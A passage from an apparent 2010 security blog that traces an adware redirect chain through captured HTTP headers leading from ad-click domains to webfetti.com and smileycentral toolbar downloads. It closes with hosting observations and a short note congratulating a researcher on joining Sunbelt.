If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"35985-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:24:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /dl/generateExternalObject.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"7350-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:24:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /http%253A%252F%252Fplugin%252Esmileycentral%252Ecom%252Fassetserver%252Fcursor%252Ejhtml%253Fcur%253D1%2526i%253D9646a/image.gif HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:24:13 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Location: http://plugin.smileycentral.com/assetserver/cursor.jhtml?cur=1&i=9646a
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
X-Pad: avoid browser bug

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=1626143730&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmr=-&utmp=/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0 HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:13 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:11 GMT
ETag: "b4221-23-4991d023"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=805765985&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmp=/clicks/splash/partner/ZKxdm194YYGB HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:16 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:12 GMT
ETag: "b4221-23-4991d024"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------
GET /assetserver/cursor.jhtml?cur=1&i=9646a HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: Thu, 18 Feb 2010 06:24:16 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Vary: Accept-Encoding
Location: http://i1img.com/images/cursormania/files/19/9646a.ani
Content-Language: en-GB
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------


The second advert, is pretty much the same outline as the first, though doesn't seem to claim to be from myrewardsvault.com this time (if it is, it's in the blacked out part), and again, the URL's;

npvos.com/click/?s=12064&c=196741
fbgdc.com/click/?s=12064&c=196741&internal=U_136o6o_1
webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0


Headers:

GET /click/?s=12064&c=196741 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://short.strange-company.info/happy/27851
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: npvos.com
Connection: Keep-Alive
Cookie: BIGipServertracking-pool=17240236.20480.0000

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:28:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:28:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Location: http://fbgdc.com/click/?s=12064&c=196741&internal=U_136o6o_1
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /click/?s=12064&c=196741&internal=U_136o6o_1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://short.strange-company.info/happy/27851
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: fbgdc.com
Connection: Keep-Alive
Cookie: 1444=KpIYL2uZmgg4yIJzEYBGyQ%3D%3D%7CqjyUwp8DXB9V1V5TMGJkPSlTNVlAjeL74g6%2BPMEneNa4Z6RpC7zW9QFEWUcve0Yl%2B8oqlmF7zn90JSJZeTfITzv7oMCc0nToxsi1O19dKCB9lyanI4LgY73jrpHvpQ0kQqDBK8kdQVOy5%2FD1Aa%2B4X77aKrtx%2BEsk%2FzjS9rGchGL2u5drA7pq17NXA6MD2vrUlUCnEkGTUu2kWVNhvIATkCfIcHnPhfZGNLvmuKC5YRHqtTytab3RN9175GmloAb8AFIUKNIRfly%2FAbFbgowvkqvrAb3fTnaIfR3xIjng4JNs%2BVcyNo8r1fRoueThopUnE9tptsH80njl2oVhkHEEVdq%2FiY92tU4JVdxBe19osUel%2BbMWt9zUfrjnqmESICOaTT8S2liDyEL9SgAH8gqFgptKLC9ALKdHG%2F773bXPz3SvNFWrTDa9oerKJUy97AS4JBoBUsOU4%2FBsBm2pCQFV4ofrFt1lRukrYIRjuRLvgR%2B9oR04tutzZPEnbXOyM%2BVPv%2BEXbB8Vz7GJO2dnBBmas%2FtAdgDeog3lsf8qpHeUcMIldPB2Sc%2BZl%2FNRReOYYmfgvrCEoxUgOiiWXH3aQDfexZk%2BQMoI%2F940Fv8a968F7h8RD%2FIYHNAx3yQo7DR%2BnOFmEhHNdM6Dgq5mt6RbXR7G2F1xTnhcVu77FHRyzVWn%2Fx77bI7QGb0UtEJuWrLavrkMo5ONcGvMFFpZSdrStN1fCDy5GwnddxVd3l9qm2GlOpqoOGp6yWrqS%2Fad9VLSz3YML1%2BSadvEtjwilzHnhXzWQ6H31ThqsAgaRa1diaQtRAhhWRnxBGd222pTYZUYE2I4Q7sbrY5sTWz7ucyxh3LFsn64R%2FfZYI8H4f%2BsRjyiJbGUoUay6fdFJ4OFLP%2BB2b20jkGrNXfylMsUlp1LNS%2FCkLPQNwlv8BRvC8r%2F2Xh6QfPDmDVx%2FUFjCRHd6o0fdtXk%2FyVxoloxn8HZseQR%2BxW6HTCLjb%2FKBv19l5PVzzHirZs%3D; 1444-encoded_click=HDYls521-; 1444-affiliate_id=31826; 1444-site_id=12064; 1444-subid=redirect_from_6471_to_1444; 1444-2378=YdptRXGxNQG5IohFGonDgQ%3D%3D%7CJE3gg24QTSzyuX22CcyLBjJTH%2FFW4bJS4swvdXvptwYz4QRk1mrQNIXg1F6oI1t8xItVV%2FsQjq2XbSMPTLXpKw%3D%3D; 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5449=1WhgdNsqXda7JGenynONkw%3D%3D%7CJ2404Gcek%2FzCxIBKZigM%2FhVCDd48NmFnyou4WBHLWtfcw2Jecf%2BxNYuTyYiCedUWuQWPqxUUi9feh17CTEiiTw%3D%3D; 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5450=7LomrXgULt929GiWG5jf0g%3D%3D%7C9wakmhYex26XFYQrpQqMS%2FlHwikSnu0mht%2BPYLGXZb%2BObCo5DIFrk%2Fi4ExiY%2BLdijTCEfaQMlnoVPUDca40jpw%3D%3D; 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5451=JwMW1js74qIieapB3WpJNw%3D%3D%7CRpJR7wMx93ueVmp10Zvw9tMV2m4%2BPv2yxblJlaLntrfO8GWGPGh7FuOX5j88evS5WhA4eY4o5Znv4h6zIMo5SQ%3D%3D; 1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5481=FqOS6ISyP8CfRFkVzZnyDA%3D%3D%7Cux%2FQ6C0Utm%2BYeSEQKK5xddyMRtwQ319FUKstK%2FX49vuTBGVzixsVTkLhrZbkgPyAqio70d7e4fwMcDRaCBWBfQ%3D%3D; 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5482=TqQNc1PGPN%2FrkYY28xiX7w%3D%3D%7CE%2BhXF4RkXJo1ZoXFBjedvbaQj8TCR4yLh%2BAISaaGZ2VMhRuslDjTyc4mYlSdl9jZaPc%2Fmop8R501XTsQKEkMBA%3D%3D; 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5483=hUmKRrUyDCTJHcIGj7c2HQ%3D%3D%7CQL5dFiB%2FfVOvqjlUmApbSxYRhEog6XDlXxvOpfNqAN0vTi5JDmp67rAENuiMR61%2BwEc%2BRF6LI1eG0S8Gs%2FmT8w%3D%3D; 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-6255=vZojfgVC9BlD3drz0wSKdw%3D%3D%7C3X9OxHiFeuoS0EJ2JOy%2FujFlC3s4XjfG8Rp3SRtPZMxzr5lXIticrs4Sl9KQuBU%2B%2Fza3zcdMlnbTcmg8H3jmwQ%3D%3D; 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-7742=C%2BFz0sqBLuTkryT1Tg8dzw%3D%3D%7C%2B8iXNv2Q7p%2FFPIh5xobW8WRLvg%2FKk%2BNkuG0EvzY7oyIQVbUJqv2f%2F4vhUjzehbNSXm9cFrK%2FvRapzjF3v%2F0jug%3D%3D; 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; BIGipServertracking-pool=16978092.20480.0000

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:28:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Set-Cookie: 1444-2378=DL9SiYGr7dCPA55N3H%2Bp%2FQ%3D%3D%7Cm%2B0JeXztVz3VC%2F%2BUInGWSGBNf1aSA77NnlUYKsYAapoNdhuLpYMlFcPOFiNa1qbgM9NQvbSP5HOOFJWwXVkOjQ%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5449=q5ZNWkuyU6AWgWU2X3SXig%3D%3D%7CFGSJw8rY3%2F4IWWm4yrvulf9upqqTljhVz%2FPeAgaKugYQOgSq8MW%2FE5KhAlswPpOfA58BEN%2BJwuu%2F%2BDHVd%2BlJGw%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5450=bu90d63x5AJ9wsBf3N46mg%3D%3D%7CY4TruIbXDnmUoOV0h8UnK566RrpFk5zZfnQNn3lunXDOuRcyXZIbcCi62HR9dALsNVE%2FYimuGkMlpL%2BEDHZV9w%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5451=mx4fZhZ%2BVw5sc%2FVMYhzPbg%3D%3D%7CJmE2n0WQa8EXbnHXk7sIWSbq9O9x5Jn3ybSkEhGzj%2BU%2BHbVhhmLhU1GfHvr3zTc%2B2F2GTxS1OfKWTnOK1UaZmQ%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5481=yJ4HBleHToQYTWb2C8GcIg%3D%3D%7CZKmukpuqaU%2BqKiFl80DRZbNDljGB3gNDG%2BjRHZsB%2FvfaRk36hLbpqXeFhcwol99T5Xtc4R53O8kjJUsw07BelA%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5482=mlI4l6CJ3TlsQlbGNL0ueg%3D%3D%7C0rh8C1n4zqEA7UoeLsWdnb8QVXWnCOzQ3LgMnNgwg%2F%2F2iy4rDvw3snabtmZVn5DEvYoFf4f%2BhgGL6dCRafZAFw%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5483=pwlBftSpPdOWRuke7vfARA%3D%3D%7CXQDHuUCkScii1fNK5yvUWqzRpVKyJLXri7vUmJ6mwSvm8bEM%2BRBEQpCf4xM31ykQ98rxmq3tHbINiDTXZdcF2Q%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-6255=8P%2B7C495%2FHaYEGIvyphgmA%3D%3D%7C7eqmYSxN1VkkT7SmRKKscKLtn69LzuU85Up1BsDAUatbMYH8obJdEVsJpxO%2F5OR3cLYvhPnuBN1PVtARvK2GzA%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-7742=DjgxrJMe3QMaX1NBqhfxXw%3D%3D%7CQgfBx9ZcykgOGWpwyrmnkeBgbipOtsFrYaedpvFSanrgJ5FPAujOl7YtiAhVd7i1nKjGR1w%2FG6LR1Iu1j74%2Fgw%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Content-Length: 802
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.webfetti.com
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:28:53 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Language: en-GB
Content-Length: 5446
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
GET /dl/toolbarDetect/toolbar.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"35985-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:28:56 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /dl/generateExternalObject.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"7350-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:28:56 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /http%253A%252F%252Fplugin%252Esmileycentral%252Ecom%252Fassetserver%252Fcursor%252Ejhtml%253Fcur%253D1%2526i%253D9646a/image.gif HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:28:58 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Location: http://plugin.smileycentral.com/assetserver/cursor.jhtml?cur=1&i=9646a
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
X-Pad: avoid browser bug

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=1737558123&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmr=-&utmp=/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0 HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:28:58 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:12 GMT
ETag: "b4221-23-4991d024"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------
GET /assetserver/cursor.jhtml?cur=1&i=9646a HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: Thu, 18 Feb 2010 06:29:01 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Vary: Accept-Encoding
Location: http://i1img.com/images/cursormania/files/19/9646a.ani
Content-Language: en-GB
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=614745390&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmp=/clicks/splash/partner/ZKxdm194YYGB HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:29:01 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:12 GMT
ETag: "b4221-23-4991d024"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------


short.strange-company.info resolves to an IP at GoDaddy (72.167.42.140, as does strange-company.info (68.178.232.100. Both are shared servers, worse of course, is we already know how lax GoDaddy are when it comes to dealing with abuse. All of the domains referenced in the headers, are owned by IAC, so feel free to blackhole the lot of them (personally, I've got their IP ranges blackholed, but that's just me).

Batman joins Sunbelt!

Some extremely great news just dropped into my RSS reader - Paperghost, aka Chris Boyd, has now joined Sunbelt' research team.

Sunbelt now have without a doubt, the best damn researcher in the world. Congrats Chris!

Read more over at the Sunbelt blog;

http://sunbeltblog.blogspot.com/2010/02/uk-researcher-joins-sunbelt.html

Tuesday, 16 February 2010

hpHOSTS - UPDATED February 17th, 2010

hpHOSTS - UPDATED February 17th, 2010

